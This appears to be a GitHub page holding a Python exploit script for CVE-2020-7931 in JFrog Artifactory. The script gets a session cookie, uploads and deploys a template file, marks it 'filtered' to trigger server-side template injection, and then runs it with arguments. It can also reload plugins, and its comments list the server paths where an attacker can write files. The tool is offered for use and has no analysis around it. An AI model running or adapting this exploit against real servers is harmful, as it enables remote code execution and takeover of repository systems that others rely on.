-
Notifications
You must be signed in to change notification settings - Fork 15
/
Copy pathartifactory_CVE-2020-7931.py
executable file
·124 lines (95 loc) · 5.19 KB
/
artifactory_CVE-2020-7931.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
#!/usr/bin/env python3
# Credits: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2019-0006.md
# Install docker artifactory: https://www.jfrog.com/confluence/display/JFROG/Installing+Artifactory#InstallingArtifactory-DockerInstallation
# Default artifactory web application root path (where you can write): /opt/jfrog/artifactory/tomcat/webapps/artifactory/
# Default tomcat webapps path (for .war files): /opt/jfrog/artifactory/tomcat/webapps/
# Default upload path: /var/opt/jfrog/artifactory/data/tmp/artifactory-uploads/
# Symlinked: /opt/jfrog/artifactory/data/tmp/artifactory-uploads/
# Default plugins path (for .groovy files): /var/opt/jfrog/artifactory/etc/plugins/
# Symlinked: /opt/jfrog/artifactory/etc/plugins/
import argparse
import requests
import json
import urllib3
repo_name = 'example-repo-local'
# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# FUNCTIONS ####################################################################
def get_cookie(host, user, password):
data = json.dumps({'user':user, 'password':password, 'type':'login'})
headers = {'Content-Type':'application/json'}
r = requests.post(host + '/artifactory/ui/auth/login',
headers=headers, data=data, verify=False)
print(r.text)
for cookie in r.cookies:
print(cookie.value)
def upload(host, file_to_upload, cookie):
cookies = {'SESSION':cookie}
headers = {'X-Requested-With':'artUI'}
files = {'upload_file': open(file_to_upload,'rb')}
r = requests.post(host + '/artifactory/ui/artifact/upload',
cookies=cookies, headers=headers, files=files, verify=False)
print(r.text)
def deploy_template(host, template, cookie):
cookies = {'SESSION':cookie}
headers = {'X-Requested-With':'artUI', 'Content-Type':'application/json'}
data = '{"action":"deploy","unitInfo":{"artifactType":"base","path":"/' + template + '","mavenArtifact":false,"valid":true,"origArtifactType":"base","debianArtifact":false,"vagrantArtifact":false,"composerArtifact":false,"cranArtifact":false,"bundle":false,"type":"xml"},"fileName":"' + template + '","repoKey":"' + repo_name + '"}'
r = requests.post(host + '/artifactory/ui/artifact/deploy',
cookies=cookies, headers=headers, data=data, verify=False)
print(r.text)
def set_filtered(host, template, cookie):
cookies = {'SESSION':cookie}
headers = {'X-Requested-With':'artUI', 'Content-Type':'application/json'}
data = '{"repoKey":"' + repo_name + '","path":"' + template + '"}'
r = requests.post(host + '/artifactory/ui/filteredResource?setFiltered=true',
cookies=cookies, headers=headers, data=data, verify=False)
print(r.text)
def drop_template(host, template, cookie):
upload(host, template, cookie)
deploy_template(host, template, cookie)
set_filtered(host, template, cookie)
def exec_template(host, template, arguments, cookie):
cookies = {'SESSION':cookie}
nb_arguments = 0
for argument in arguments:
if nb_arguments == 0:
http_arguments = '?{}={}'.format(nb_arguments, argument)
else:
http_arguments = http_arguments + '&{}={}'.format(nb_arguments, argument)
nb_arguments += 1
r = requests.get(host + '/artifactory/' + repo_name + '/' + template + http_arguments,
cookies=cookies, verify=False)
print(r.text)
def reload_plugins(host, cookie):
cookies = {'SESSION':cookie}
headers = {'X-Requested-With':'artUI'}
print(host + '/artifactory/api/plugins/reload')
r = requests.post(host + '/artifactory/api/plugins/reload',
cookies=cookies, headers=headers, verify=False)
print(r.text)
# MAIN #########################################################################
parser = argparse.ArgumentParser(description = '')
parser.add_argument('-H', '--host', type=str, required=True)
parser.add_argument('-u', '--user', type=str)
parser.add_argument('-p', '--password', type=str)
parser.add_argument('-c', '--cookie', type=str)
parser.add_argument('-U', '--upload', type=str)
parser.add_argument('-g', '--get_cookie', action='store_true')
parser.add_argument('-d', '--drop_template', type=str)
parser.add_argument('-e', '--exec_template', type=str)
parser.add_argument('-r', '--reload_plugins', action='store_true')
parser.add_argument('-R', '--repository_name', type=str, help='Default: example-repo-local')
args, remaining_args = parser.parse_known_args()
host = args.host.rstrip('/') # Java is retarded
if args.repository_name:
repo_name = args.repository_name
if args.upload:
upload(host, args.upload, args.cookie)
if args.get_cookie:
get_cookie(host, args.user, args.password)
if args.drop_template:
drop_template(host, args.drop_template, args.cookie)
if args.exec_template:
exec_template(host, args.exec_template, remaining_args, args.cookie)
if args.reload_plugins:
reload_plugins(host, args.cookie)